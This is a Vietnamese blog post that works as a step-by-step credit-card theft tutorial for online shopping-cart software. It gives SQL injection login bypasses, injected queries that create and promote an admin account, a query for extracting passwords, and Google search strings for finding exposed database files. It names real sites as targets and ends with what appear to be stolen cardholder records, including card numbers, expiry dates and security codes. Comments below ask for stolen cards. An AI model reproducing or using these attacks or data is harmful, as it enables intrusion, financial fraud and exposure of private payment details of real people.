jump to navigation

Hack thẻ tín dụng 19/11/2007

Posted by Hung Nguyen in Uncategorized.
Tags:
trackback
Chào mừng bạn đã đến với Silvery Hat Hacker. Trong bài viết này , Silvery Hat Hacker sẽ giới thiệu đến với bạn 10 cách đánh cắp Thẻ Tín Dụng qua lỗi Sql Injection lẫn các lỗi thông qua Google và các Bug khác… Có thể bạn đã bắt gặp ở đâu đó cách thức hack tương tự như trong những bài viết này , nhưng vì nhiều người bạn qua Yahoo Messenger đã hỏi hay nói với Silvery Hat Hacker rằng họ chưa hiểu hay chưa biết rõ phải làm sao. Vì vậy Silvery Hat Hacker đành viết lại 1 lần nữa chuỗi bài viết về Hack cc này. Cũ có mới cũng có nhưng lỗi vẫn là lỗi và Silvery Hat Hacker đã chọn ra và sưu tầm từ nhiều nguồn những phương pháp còn có thể thành công để trình bày ở đây…

1-Thông qua lỗi SQL của Alabanza AlaCart :

A\Mô tả :

AlaCart là 1 trong những ứng dụng web dùng để trao đổi và mua bán hàng qua mạng của Alabanza , 1 công ty chuyên về Dịch vụ Máy Chủ tự Động Hóa ( Web hosting automation ) . Trong phiên bản đã kiểm nghiệm ( v1.27 ) , Silvery Hat Hacker và anh bạn đã viết ra bài này ( phiên bản English ) đã phát hiện ra lỗi chèn đọan mã SQL vào quá trình đăng nhập của AlaCart trong vai trò Administrator để quản lý cơ sở dữ liệu tòan bộ thành phần của Web có vấn đề. Nó cho phép Tin tặc có thể đăng nhập mả không cần biết Username và Password. ( Lỗi Sql : Nếu bạn không biết vì sao hãy tham khảo ở đây hay các bài khác của phần Kiến thức Cơ Bản để học hỏi thêm )

B\Tiến Hành :

Bạn cần 1 website cài đặt AlaCart

Công nghệ quản lý Mua-Bán của AlaCart nằm trong thư mục /s-car

Để bắt đầu truy vào trang đăng nhập của Admin , ta có thư mục /admin

=> ta sẽ có www.tên website.tên miền/s-car/admin => bạn vào được trang đăng nhập. Nó sẽ xuất hiện thông báo đòi tên truy nhập và mật khẩu

-Vì bạn đã biết AlaCart bị SQL nên ta sẽ dùng các Username và Password dùng để Bypass tương tự như sao : ‘or”=’

-Vào được cơ sở quản lý rồi. Bạn vẫn còn khó khăn trước mắt :

+Nhìn vào không thấy Thẻ Tín Dụng

+Tòan chữ và chữ

Bạn đừng thất vọng , vì khi vừa vào là bạn đã gặp ngay phần Help – Trợ Giúp được mặc định hiển thị của AlaCart nên click vào các link ở giữa trước mắt chỉ là tìm hiểu cách họat động của chúng chứ không phải điều khiển chúng. Bạn nhìn lên các dòng ngang , tìm Order Options hay Order. Trong trang kế , bạn tìm dòng :

Please enter the email address to which orders will be sent: – Xin hảy vui lòng nhập vào địa chỉ email mà các thông tin mua bán sẽ được gửi đến:

-Tới đây không thể chỉ hơn được nữa , bạn hãy tự làm lấy , mặc dù phải chờ đợi..Nhưng chúc may mắn. Silvery Hat Hacker đã lấy được rất nhiều Thẻ Tín Dụng bằng cách này rồi.

Trang ví dụ ( bạn kiếm thêm qua Google bằng từ khóa s-cart/admin/ ) :

http://avantiparts.net/s-cart/admin/

http://64.177.121.164/s-cart/admin/

Đừng phá quá , tội người khác nha , các Newbies. Thanks

2-Thông qua lỗi SQL của VP-ASP:

A\Mô tả :

Cái này đã quá quen thuộc với dân Ăn cắp Thẻ Tín Dụng rồi. Silvery Hat Hacker chỉ nói sơ qua thôi. Đây là 1 công cụ mạnh mẽ giúp cho admin của các website Bán hàng quản lý cơ sở dữ liệu của mình dễ dàng hơn. Tiện lợi , nhưng VP-ASP có cả khối lỗi cho Hackers khai thác…Silvery Hat Hacker sẽ từ từ trình bày chúng lên cho các bạn THAM KHẢO – chỉ mong bạn tham khảo cho biết thôi…

B\Tiến Hành :

-SQL Injection lại tiếp tục làm khổ các website…Bạn tiếp tục có cơ hội để bypass – đăng nhập trái phép vào vai trò admin qua ‘or”=’ để “quản lý” cơ sơ dữ liệu hộ admin.

Đường dẫn để đăng nhập

www.tên website.tên miền/vpasp/shopadmin.asp

-1 số admin “quên” đổi Username và password mặc định vpasp/vpasp hay admin/admin . Bạn có thêm 1 cơ hội nhỏ nữa .

3-Thông qua lỗi SQL của Storefront:

A\Mô tả :

Storefront cũng như VP-ASP , nó là 1 hệ thống bao gồm tất cả những gì cần thiết cho việc quản lý 1 website thương mại trên Internet….Và , cũng như AlaCart và VP-ASP , Storefront bị dính lỗi SQL ở trang Login mà qua đó cho phép hackers lấy quyền đăng nhập vào phần quản lý của Admin mà không cần sự cho phép.

B\Tiến Hành :

-Bạn vào http://www.google.com/intl/xx-hacker/ , tìm với từ khóa Storefront allinurl:/login.asp . Sau khi tìm được những trang Login , bạn dùng Username và Password ‘ or ‘a’=’a để bypass vào.

-Nếu như bạn đã biết trước địa chỉ email của ai đó , bạn cũng có thể sử dụng nó ở đây theo dạng sau :

Username : địa chỉ email đã biết

Password : ‘ or ‘a’=’a

=> Bạn vào được phần quản lý của user sở hữu địa chỉ email trên. Việc lấy thẻ tín dụng ở đây không còn là việc khó khăn nữa.

4-Thông qua lỗi SQL của VP-ASP:

A\Mô tả :

1 phiên bản khác của VP-ASP , lỗi SQL đã được phát hiện ra trong 2 trang shopsearch.asp và shopdisplayproducts.asp qua đó cho phép những tin tặc tạo 1 tài khỏan Người Quản Trị mới , đổi mật khẩu của Admin trước đó mà không cần biết password hay chỉ đơn giản là đăng nhập trái phép để đọc thong tin bán hang của website…Bao gồm cà thẻ tín dụng

B\Tiến Hành :

Như thường lệ bạn tìm trong Google…allinurl:shopsearch.asp hay allinurl:shopdisplayproducts.asp .

Vấn đề ở đây là bạn không thể nào bypass vào tài khỏan admin được như 3 cách trên mà phải thực hiện 1 số mã lệnh SQL trước ( Lưu ý rằng những đọan mã sau bạn chèn vào ngay sau đường Link shopsearch.asp? ) :

A\THÔNG QUA TRANG SHOPSEARCH.ASP

I - Chèn 1 tài khỏan vào Database :

-Câu lệnh :

Keyword=&category=5); insert into tbluser (fldusername) values (‘tên tài khỏan’)–&SubCategory=&hide=&action.x=46&action.y=6

-Ví dụ :

http://www.birnsandsawyer.com/webcar…=&category=5); insert into tbluser (fldusername) values (‘silveryhat’)–&SubCategory=&hide=&action.x=46&action.y=6

II - Thiết lập mật khẩu cho tài khỏan đã có :

-Câu lệnh :

Keyword=&category=5); update tbluser set fldpassword=’mật khẩu’ where fldusername=’tên tài khỏan’–&SubCategory=All&action.x=33&action.y=6

-Ví dụ :

http://www.birnsandsawyer.com/webcar…=&category=5); update tbluser set fldpassword=’87fzvwek’ where fldusername=’silveryhat’–&SubCategory=All&action.x=33&action.y=6

III – Thiết lập quyền truy cập của tài khỏan ( ở đây cho là quyền của người quản trị cho nó oai ) :

-Câu lệnh :

Keyword=&category=3); update tbluser set fldaccess=’1 – đây là quyền của admin’ where fldusername=’tên tài khỏan’–&SubCategory=All&action.x=33&action.y=6

-Ví dụ :

http://www.birnsandsawyer.com/webcar…=&category=3); update tbluser set fldaccess=’1′ where fldusername=’silveryhat’–&SubCategory=All&action.x=33&action.y=6

Đó là 3 hàng lệnh mà bạn nên biết khi bắt đầu hack vào VP-ASP qua trang shopsearch.asp. Tất nhiên nó còn vài câu lệnh nữa, nhưng Silvery Hat Hacker không muốn thực hành ở đây , bạn hãy xem sơ qua câu lệnh :

IV\Đổi password 1 tài khỏan :

Keyword=&category=5); update tbluser set fldpassword=’mật khẩu mới’ where fldusername=’tên tài khỏan’–&SubCategory=All&action.x=33&action.y=6

V\Xem mật khẩu của 1 tài khỏan :

cat=qwerty’%20union%20select%20fldauto,fldpassword %20from%20tbluser%20where%20fldusername=’tên tài khỏan’%20and%20fldpasswo rd%20like%20′a%25′—

B\THÔNG QUA TRANG SHOPDISPLAYPRODUCTS.ASP

-Nói thật ra thì Silvery Hat Hacker cũng chưa nắm rõ về phương pháp này cho lắm vì chưa có cơ hội thực hành với trang shopdisplayproducts.asp. Tuy nhưng Silvery Hat Hacker tin chắc nó có liên quan đến việc Xem mật khẩu của tài khoản ở trên.

http://tên website/vpasp/shopdisplayproducts.asp?cat=qwerty’ union%20select fldauto,fldpassword%20from%20tbluser%20where fldusername=’admin’%20and%20fldpassword%20like%20′ a%25′–

Bạn thay lần lượt dòng cuối cùng ( màu xanh lá cây ) bằng :

%20′a%25′–

%20′b%25′–

%20′c%25′—

Lỗi này được thông báo cho VP-ASP ngày 28/11/2003

5\Lỗi đường dẫn của ProductCart :

A\Mô tả :

-ProductCart một sản phẩm đầu tay của hãng Early Impact, nó giúp cho người quản trị website bán hàng trực tuyến dễ dàng điều khiển thiết lập hay tinh chỉnh tính năng và tiện ích trong Website của mình 1 cách trực quan và dễ hiểu qua giao diện quản lý rất thân thiện. Tuy không thể so sánh với VP-ASP , 1 cao thủ trong số các phần mềm bán hàng trực tuyến với hàng trăm website sử dụng và hàng chục Bug lỗi trong đó. Vì thế , ở đây, ProductCart chỉ là hạng lon con với 1 lỗi duy nhất, cực kỳ nguy hiểm. Qua lỗi này, Silvery Hat Hacker có thể trực tiếp đưa về máy mình mười mấy Megabytes Credit Cards và thông tin về khác mua hàng trong Website đó. Lỗi đường dẫn diễn ra, nghĩa là chúng ta không cần biết Website đó như thế nào, trông ra sao, bên trong có thư mục gì, hình ảnh thế nào….nhưng vẫn có thể tải 1 số thẻ tín dụng về máy mình trơn tru, ít bị phát hiện vì Admin có thể không xác định được đã có người ghé thăm nhà mình và bê cái két sắt ( Credit Cards ) về làm của riêng đâu…

B\Tiến hành :

-Hầu hết chúng ta đều dùng công cụ Google để tìm kiếm 1 thông tin hay tài liệu website nào đó nhằm cho nhiều mục đích vui chơi và học tập. Thế nhưng , bên cạnh đó Google cũng tài sản vô giá của Hackers khi nó trở thành mục tiêu trung gian để khai thác, xâm nhập bất hợp pháp vào khu vực của 1 Website nào đó mà người dùng bình thường không thể biết. Chỉ với 1 từ khóa đơn giản, thông tin quan trọng về Webmaster,người đó có thể bị lộ, chỉ với 1 từ khóa đơn giản, password của ai đó có thể bị mất, và, chỉ với 1 từ khóa đơn giản, bạn có thể download cả Database – tập tin quản lý dữ liệu chứa hàng chục Credit Card chùa về máy mình mà không cần phải vào xem mặt Website đó. Tương tự như ở đây, ProductCart bị mắc lỗi ở việc quản lý đường dẫn đưa tới nơi lưu trữ Database cực kỳ nguy hiểm mà cho phép chúng ta làm công việc Silvery Hat Hacker nói ở trên.

-Trong quá trình thực hành theo bài viết này, Silvery Hat Hacker sẽ không chịu bất kỳ trách nhiệm nào do bạn gây ra làm ảnh hưởng đến nhân dân trong cộng đồng Internet này, chính bạn sẽ là người gánh hết mọi hậu quả khi có vấn đề liên quan đến pháp luật. Nếu bạn không chắc về những gì mình làm, Silvery Hat Hacker đề nghị bạn đóng của sổ trình duyệt hiện tại, xé bỏ tờ giấy nếu bạn có bản in của tài liệu này trước khi mọi chuyện do bạn làm trở nên tồi tệ hơn.

-Ah, bạn không làm theo Silvery Hat Hacker nói ở trên àh ? Sau khi đọc hết dòng chữ bạn đang đọc này nghĩa là bạn đã đồng ý với luật lệ Silvery Hat Hacker nói ở trên và chấp nhận liều mạng. Ta hãy bắt đầu vấn đề chính :

+Bạn vào http://www.google.com/intl/xx-hacker/ , tìm với từ khóa sau Allinurl:/productcart/ . Hàng lọat link web sẽ xuất hiện trong cửa sổ kết quả của Google. Bạn chọn đại 1 link nào đó ở trang thứ 3 hay 4 trở đi. Silvery Hat Hacker chọn http://store.klas-fm.firstmediaworks.com/ để làm dẫn chứng minh họa.

+Có được 1 trang web dùng ProductCart , vấn đề kế tiếp bạn làm thêm vào tên của sản phẩm này sau link web :

http://store.klas-fm.firstmediaworks.com/ProductCart

+Chẳng có gì xảy ra ngọai trừ vào website nếu bạn click link đó phải không ? Nhưng nếu, dừng lại suy nghĩ giây lát, bạn biết thẻ tín dụng thường được chứa trong Database để dễ quản lý phải không ? Vậy nó thường chứa ở đâu trong website bây giờ ?… Silvery Hat Hacker thử lấy đại biệt danh của tập tin chứa Credit Card này thêm vào link :

http://store.klas-fm.firstmediaworks…tCart/Database

+Tự nhiên cái thấy vui nên viết dòng này.

+Nếu bạn chưa thấy được Database thì để Silvery Hat Hacker giúp vậy, bạn thêm EIPC.mdb vào nơi tận cùng link sau khi đã qua các giai đọan ở trên, ta có ví dụ :

http://store.klas-fm.firstmediaworks…abase/EIPC.mdb

+Thử click Refresh hoặc Go trên trình duyệt. Chẳng thấy gì xảy ra cả, tự nhiên bắt tải tập tin gì đó gần 2.24 Mb về máy với đuôi mdb. Mở ra hàng đống cột và bàng như Credit Cards, Customers, Admin, Orders…..

C\Tóm gọn:

-Đối tượng : ProductCart của hãng Early Impact.

-Phiên bản : Không rõ.

-Đối tượng có liên quan : trình tìm kiếm Google.

-Mức độ lỗi : Nguy hiểm cho người mua hàng ở Website đó.

+Khả năng lấy được Credit Card : 3.5/5

-Công thức – Cách khai thác gồm có :

http://www.tên website dùng ProductCart.tên miền/ProductCart/Database/EIPC.mdb

-Được gì ?

Tập tin chứa Credit Cards của Website đó.

-Vấn đề lớn nhưng cũng hơi nhỏ : có thể Database bị mã hóa !

-Hướng giải quyết : Tìm trình giải mã bằng Google

Bài viết đến đây chấm dứt. Tùy vào khả năng mỗi bạn mà có thể hack được hay không. Nhưng vấn đề chính ở đây là cách giải mã nếu database bị mã hóa mà thôi. Silvery Hat Hacker đã thử viết 1 trình nhưng cho ra kết quả Credit Card 1 nơi , tên 1 nơi, địa chỉ lại ở nơi khác nên thôi, bạn nên vào Google và tìm trình giải mã. Có lẽ qua câu lệnh như : Mdp Decoder chẳng hạn.

Bài phụ :

I\Lỗi đường dẫn Fpdb của 1 trình quản lý mua hàng trực tuyến :

+Tìm trong Google với từ khóa sau :

allinurl: /fpdb/

+Vài chục trang sẽ xuất hiện, Silvery Hat Hacker đưa ví dụ sau :

http://home.cfl.rr.com/pcscap/Fpdb/

+Trong cửa sổ mới, bạn chọn tùy lọai mdb mà tải về.

+Khả năng lấy được Credit Card : 3/5

II\Lỗi đường dẫn shop.mdb của 1 trình quản lý mua hàng trực tuyến :

+Lại là Google thôi bạn :

allinurl: shop.mdb

+Vài chục trang sẽ lại xuất hiện, Silvery Hat Hacker cũng đưa ví dụ chứng minh :

http://www.thomas.edu/larochelle/cs1…key%20Shop.mdb

http://www.staff.sbc.edu/kcook/class…Pet%20Shop.mdb

+Khả năng lấy được Credit Card : 1.75/5

bài này tôi lấy từ shacker mong các bạn chỉ bảo thêm
http://hackerxuquang.vnn.bz

Thử nhé:

20354/LOTTIE T KENNEY/1054 LYNWOOD DRIVE/MONTGOMERY/AL/36111/6011004310702937/09/2006/114

20353/darryl pinckney/2109 Broadway/New York/NY/10023/374286146523017/04/2006/2273

20349/FRANCELINA A NETO/1751 BRIDGEPORT AVENUE/CLAREMONT/CA/91711/4820993650075902/03/2006/062

20345/Kathleen K Horowitz/132 E Kaniksu St/Apache Junction/AZ/85219-9838/6011298923329076/09/2006/501

(Theo nguồn http://luongsonbac.com/forum/)

About these ads

Comments»

1. Larson Smith - 19/06/2008

hello this is male from usa i really need some shopadmins and credit cards if you can help me with this i will reallt be hapy with you as well and also make you to come to usa and work for me

2. taofik - 19/06/2008

hello pls help me out with shopadmins

3. Cong dong IT Quang Nam - 06/01/2013

Helpful information. Fortunate me I discovered your web site unintentionally, and I am shocked why this accident didn’t took place earlier! I bookmarked it.

4. auto loans For bad credit - 30/06/2013

They assist in finding auto loans for bad credit that best suit
your needs. Co-applicant and Co-signerThe difference between a co-applicant and a
co-signer can usually be found in the market.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: